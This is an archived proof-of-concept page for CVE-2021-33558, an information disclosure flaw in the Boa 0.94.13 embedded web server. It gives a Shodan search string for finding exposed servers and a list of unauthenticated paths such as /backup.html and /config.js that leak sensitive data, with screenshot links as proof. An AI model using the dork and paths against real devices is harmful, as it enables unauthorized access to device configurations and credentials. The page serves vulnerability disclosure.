CVE-2021-33558 PoC — Boa 信息泄露漏洞

Source

https://github.com/anldori/CVE-2021-33558

Associated Vulnerability

Title:Boa 信息泄露漏洞 (CVE-2021-33558)
Description:Boa是Boa开源的一种适用于嵌入式应用程序的开放源代码。 Boa 0.94.13 版本存在信息泄露漏洞，该漏洞允许远程攻击者通过错误配置获取敏感信息。

Description

CVE-2021-33558 POC

Readme

# CVE-2021-33558

Reference: https://www.cvedetails.com/cve/CVE-2021-33558

Shodan dork: ```product:"Boa Web Server" 0.94.13```

Payload:

```
/backup.html
/preview.html
/js/log.js
/log.html
/email.html
/online-users.html
/config.js
```

POC:

![image](https://user-images.githubusercontent.com/101538840/204190349-ebe87daa-36fd-4503-b27d-663a1365332b.png)

![image](https://user-images.githubusercontent.com/101538840/204190426-e5bb359b-d5cc-4289-a150-493913673415.png)

File Snapshot


 [4.0K]  /data/pocs/691c00f12b5d482d7efbab7674edf353ee16912e
└── [ 471]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!